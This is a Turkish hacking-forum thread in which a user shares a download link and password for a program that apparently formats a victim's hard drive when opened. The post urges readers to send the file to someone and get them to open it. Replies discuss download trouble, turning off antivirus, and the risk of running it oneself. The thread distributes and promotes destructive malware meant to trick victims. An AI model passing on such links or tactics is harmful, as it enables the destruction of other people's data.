Pc-çökert

Black_Knight

Katılımcı Üye
12 Eki 2006
444
2
Pc çökert ile artık bilgisayar çökertmek çok daha kolay.Tek yapmanız gereken dosyayı karşı tarafa gönderip açmasını sağlamaktır...İyi çökertmeler.
Resmen bilgisayarı çökertiyorsunuz!!!! Virüs değilde daha ziyade çökertme format attırma gibi birşey de denilebilir!!! İşte program

Bilgisayara format attırıyorsunuz mükemmel bişey:

Holy_One_Hard_Formatter_XP programi bu programi biliyorsunuzdur* bilmeyenler için anlatayım bu programı aynı vatos gibi kuruyosunuz ama bunda mail falan yok bunu açan kurbanin bilgisayarina direkt format atılıyor.%100 çalışıyor.Format atma süresi 1 veya 2 saniye içerisinde gerçekleşmektedir...
işte link:
http://rapidshare.com/files/1312694/pc__oekert.rar:puah

dead team

Katılımcı Üye
3 Eki 2006
632
0
cehennemin dibi
ya abi indiriyom programı gelmiyo bilmem ne dosyasına alınamıyor yazıyo ne yapcam virüs falan var diye antivirüsü kapatıyom yine olmuyo ne yapcam.

Abdulber

Yeni üye
16 Eki 2006
1
0
program verıyorsun .. rar şifresinden haberın yoq.. dıkkat etsene arkadasım.. bırsuru ınsan download edıyor ...

burakkol90

Yeni üye
25 Ocak 2007
5
0
kardes ben bunu yaptım google pc çökert yazın hemen karşınızda bende yuklu ama en ufak bir şeyde ava gıderken avlanırsınız bilmeden acmayın onemli uyarı kurarken dosyayı açarsanız gorursunuz aynısını az kalsın ben yapıyordum emege saygı

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.